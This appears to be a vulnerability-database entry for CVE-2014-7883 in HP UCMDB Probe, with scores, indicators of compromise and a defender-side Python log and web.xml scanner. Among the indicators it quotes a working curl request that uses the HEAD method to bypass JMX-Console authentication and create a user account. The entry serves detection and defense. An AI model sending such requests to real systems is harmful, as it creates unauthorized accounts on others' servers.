CVE-2014-7883
published 2015-02-15


Priority: P3 (37, medium)
CVSS 2.0: 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
EXPLOIT
EPSS: 37.02% (98.3th percentile)
HP Universal CMDB (UCMDB) Probe 9.05, 10.01, and 10.11 enables the HTTP TRACE method, which allows remote attackers to obtain sensitive information by reading the headers of a response.

Affected (3 ranges)

Vendor  Product                                      Version range  Fixed in
hp      universal_configuration_management_database
hp      universal_configuration_management_database
hp      universal_configuration_management_database

Detection & IOCs (extracted from sources)

URL: /jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser
Path: /jmx-console/HtmlAdaptor
Port: 8080
Command: curl -I "http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser"
  • Detect HTTP HEAD (and other non-GET/POST) method requests to the JMX-Console path /jmx-console/HtmlAdaptor, which bypasses access controls enforced only on GET and POST.
  • Alert on HTTP TRACE method requests to HP UCMDB Probe endpoints, which can expose sensitive header information.
  • Monitor for requests to /jmx-console/HtmlAdaptor containing 'createUser' in the query string, indicating attempted account creation via authentication bypass.
  • Inspect web.xml security constraints on the JMX Console; if only GET and POST are listed under protected methods, the application is vulnerable to method-bypass attacks.
  • The vulnerability is identical in nature to CVE-2010-0738 (JBoss JMX-Console Authentication Bypass); detection logic developed for that CVE may be reusable here.
  • The JMX Console is installed and exposed by default; affected versions include UCMDB 10.10 and potentially others.
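Added here as a defender-side example (not code from the advisory, HP or ZDI): a Python script that applies the detection points above to constructed access-log lines (non-GET/POST verbs and createUser invocations against /jmx-console/HtmlAdaptor, TRACE requests anywhere) and checks a constructed web.xml fragment for a security constraint that names only GET and POST. The combined log format, the 10.0.0.x addresses and the "admin" role name are assumptions.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def classify_request(line):
    """Return the alert tags for one access-log line (empty list if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    method, parts, alerts = m["method"], urlsplit(m["target"]), []
    if method == "TRACE":                      # TRACE echoes request headers back in the body
        alerts.append("trace-method")
    if parts.path == "/jmx-console/HtmlAdaptor":
        if method not in ("GET", "POST"):      # verb outside a GET/POST-only constraint
            alerts.append("jmx-console-method-bypass")
        if "createUser" in parse_qs(parts.query).get("methodName", []):
            alerts.append("jmx-console-createUser")
    return alerts

def scan_access_log(text):
    """(line number, source address, tags) for every flagged line."""
    hits = [(n, LOG_RE.match(l), classify_request(l)) for n, l in enumerate(text.splitlines(), 1)]
    return [(n, m["src"], tags) for n, m, tags in hits if tags]

def constraint_limited_to_get_post(web_xml):
    """True if any <security-constraint> lists only GET/POST in <http-method>, which
    leaves HEAD and every other verb outside the constraint (the web.xml check above)."""
    local = lambda e: e.tag.rsplit("}", 1)[-1]      # tolerate a default xmlns on web-app
    for sc in (e for e in ET.fromstring(web_xml).iter() if local(e) == "security-constraint"):
        methods = {(e.text or "").strip().upper() for e in sc.iter() if local(e) == "http-method"}
        if methods and methods <= {"GET", "POST"}:
            return True
    return False

# Constructed sample data (not from the advisory); addresses and role name are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Feb/2015:10:00:01 +0000] "GET /jmx-console/HtmlAdaptor HTTP/1.1" 401 0
10.0.0.5 - - [15/Feb/2015:10:00:02 +0000] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser HTTP/1.1" 200 0
10.0.0.9 - - [15/Feb/2015:10:00:03 +0000] "TRACE / HTTP/1.1" 200 312
"""
WEAK_WEB_XML = """<web-app><security-constraint><web-resource-collection>
<web-resource-name>HtmlAdaptor</web-resource-name><url-pattern>/*</url-pattern>
<http-method>GET</http-method><http-method>POST</http-method>
</web-resource-collection><auth-constraint><role-name>admin</role-name></auth-constraint>
</security-constraint></web-app>"""
# Dropping the <http-method> list makes the same constraint apply to every verb.
FIXED_WEB_XML = re.sub(r"<http-method>\w+</http-method>", "", WEAK_WEB_XML)
```

The first sample line (an authenticated GET answered with 401) produces no alert, so the scan only reports the HEAD bypass with createUser and the TRACE request.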